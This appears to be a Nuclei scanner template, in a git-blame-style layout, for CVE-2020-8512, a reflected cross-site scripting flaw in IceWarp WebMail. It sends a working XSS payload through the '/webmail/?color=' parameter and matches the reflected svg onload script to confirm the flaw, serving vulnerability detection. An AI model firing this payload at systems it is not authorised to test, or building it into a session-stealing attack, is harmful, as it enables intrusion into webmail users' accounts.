2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-8512
|
2020-06-26 03:44:54 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: IceWarp WebMail XSS
|
2021-06-09 12:20:56 +00:00
|
|
|
author: pdteam,dwisiswant0
|
2020-06-26 03:44:54 +00:00
|
|
|
severity: medium
|
2020-08-25 22:52:00 +00:00
|
|
|
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-03-24 07:00:21 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47988
|
|
|
|
- https://twitter.com/sagaryadav8742/status/1275170967527006208
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,xss
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.10
|
|
|
|
cve-id: CVE-2020-8512
|
|
|
|
cwe-id: CWE-79
|
2020-06-26 03:44:54 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-04 05:55:13 +00:00
|
|
|
- '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
|
2020-07-10 20:30:14 +00:00
|
|
|
matchers-condition: and
|
2020-06-26 03:44:54 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2020-09-04 05:55:13 +00:00
|
|
|
- "<svg/onload=alert(document.domain)>"
|
2020-06-26 03:44:54 +00:00
|
|
|
part: body
|
2020-07-10 20:30:14 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
2020-08-25 22:52:00 +00:00
|
|
|
- 200
|
2020-12-13 19:24:23 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|